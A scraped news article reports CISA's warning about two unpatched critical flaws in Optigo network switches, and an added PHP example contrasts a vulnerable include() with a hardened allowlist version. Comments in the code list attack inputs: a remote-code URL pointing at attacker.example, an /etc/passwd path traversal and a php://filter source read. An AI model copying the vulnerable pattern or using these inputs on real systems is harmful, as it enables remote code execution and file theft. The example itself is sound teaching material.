Article Details
Scrape Timestamp (UTC): 2024-10-02 20:41:34.722
Source: https://www.theregister.com/2024/10/02/cisa_optigo_switch_flaws/
Original Article Text
Two simple give-me-control security bugs found in Optigo network switches used in critical manufacturing

Poor use of PHP include() strikes again

Two trivial but critical security holes have been found in Optigo's Spectra Aggregation Switch, and so far no patch is available. The vulnerabilities, both with CVSS v4 severity scores of 9.3, can be abused by a remote attacker to inject malware into the OT network management switches if they are running version 1.3.7 or earlier.

According to the US government's Cybersecurity and Infrastructure Security Agency, aka CISA, Optigo's vulnerable switches can be easily compromised by an unauthenticated remote user. The agency also said the networking gear can be found in critical manufacturing settings, though to be honest, the hardware can be used for wiring up the network of any small or large building.

The first flaw, CVE-2024-41925, is a PHP remote-file inclusion vulnerability affecting the web-based user interface for the switch. By exploiting it, a remote attacker would be able to bypass authentication, move between directories on the equipment, and execute arbitrary code on the target. That means the intruder needs to be able to reach the device's web interface to pull this off.

The second, CVE-2024-45367, is an incomplete authentication process at the web server level on the Canadian manufacturer's kit. A remote attacker could simply get in without needing to use a password, CISA warns. Again, exploitation requires the miscreant to be able to reach the web interface. If that's accessible from the public internet somehow, that's not good; you need to cut off that access. If it's reachable from an internal network, you need to make sure whoever can reach that equipment is trusted and secure.

There are no patches yet. Optigo hasn't responded to questions on the matter, though the manufacturer has issued a series of workarounds that should mitigate the vulnerabilities.
It recommends the following:

There are no signs that these vulnerabilities are being exploited at the moment, CISA said, though now the advisories are out, it could just be a matter of time before they are abused. The flaws were found and reported by the enterprise security shop Claroty's Team82, who had no comment at the time of publication.
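To show what "poor use of PHP include()" looks like in practice, here is an added illustration of the remote-file-inclusion bug class next to a hardened version. This is example code written for this page, not Optigo's firmware or Claroty's proof of concept; the request parameter name `page`, the `pages/` directory and the page names are assumptions made for the demo, and the advisories do not say which parameter the Optigo switch exposes.

```php
<?php
// Added illustration of the PHP remote-file-inclusion (RFI) bug class.
// NOT Optigo's code: the "page" parameter, the pages/ directory and the page
// names below are assumptions for this demo.

// VULNERABLE: a request-controlled string reaches include() unchanged.
// With allow_url_include=On, ?page=http://attacker.example/shell.txt makes PHP
// fetch and execute remote code before any login check in the included page
// can run. Even with it Off, ?page=../../../../etc/passwd walks the filesystem
// (old PHP versions also honoured a %00 to drop the ".php" suffix), and
// php://filter/convert.base64-encode/resource=config lets an attacker read source.
function renderPageVulnerable(string $page): void
{
    include $page . '.php';
}

// HARDENED: the untrusted name is only ever used as a key into a fixed
// allowlist, so the attacker can pick *which* approved file runs, never *what*.
const PAGES = [
    'status' => __DIR__ . '/pages/status.php',
    'ports'  => __DIR__ . '/pages/ports.php',
    'vlans'  => __DIR__ . '/pages/vlans.php',
];

function resolvePage(string $page): ?string
{
    // Returns the fixed path for a known page name, or null for anything else.
    return PAGES[$page] ?? null;
}

function renderPageHardened(string $page): void
{
    $path = resolvePage($page);
    if ($path === null) {
        http_response_code(404);
        exit('unknown page');
    }
    include $path;
}

// Authentication belongs in the front controller, before any include() runs,
// so an attacker cannot reach the includer without a session. A minimal form:
function requireLogin(): void
{
    session_start();
    if (empty($_SESSION['user'])) {
        http_response_code(401);
        exit('login required');
    }
}

// Defence in depth belongs in php.ini as well, independent of the code:
//   allow_url_include = Off      ; include()/require() can never fetch over the network
//   allow_url_fopen   = Off      ; unless something genuinely needs remote fopen()
//   open_basedir      = /var/www/html   ; confine file access to the web root

// Entry point (only runs when this file is served directly, not when included).
if (PHP_SAPI !== 'cli' && realpath($_SERVER['SCRIPT_FILENAME'] ?? '') === __FILE__) {
    requireLogin();
    renderPageHardened($_GET['page'] ?? 'status');
}
```

Note that the allowlist, not a blocklist of `../` or `http://`, is what closes the hole: PHP stream wrappers (`php://`, `data://`, `phar://`, `zip://`) give an attacker far more ways to express an include target than a regex is likely to anticipate, and `open_basedir` only constrains local paths. The `php.ini` settings are a backstop for the day somebody adds another include() without the allowlist, which is exactly the pattern the CISA advisory describes.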
Daily Brief Summary
Two significant security vulnerabilities have been identified in Optigo's Spectra Aggregation Switch, affecting version 1.3.7 and earlier, with no patch currently available.
Remote attackers can exploit these flaws to inject malware into operational technology (OT) network management switches.
CISA has issued a warning about these vulnerabilities, particularly highlighting their presence in critical manufacturing settings.
The first vulnerability (CVE-2024-41925) allows unauthorized remote file inclusion and code execution through the web-based interface.
The second vulnerability (CVE-2024-45367) involves an incomplete authentication process that permits access without a password.
Although there are no signs of exploitation so far, the publication of the advisories could lead to exploitation attempts before long.
Optigo has suggested some temporary workarounds but has not provided a direct response to inquiries about these security issues.
Discovered by Claroty's Team82, these vulnerabilities underline the importance of securing network equipment in critical sectors.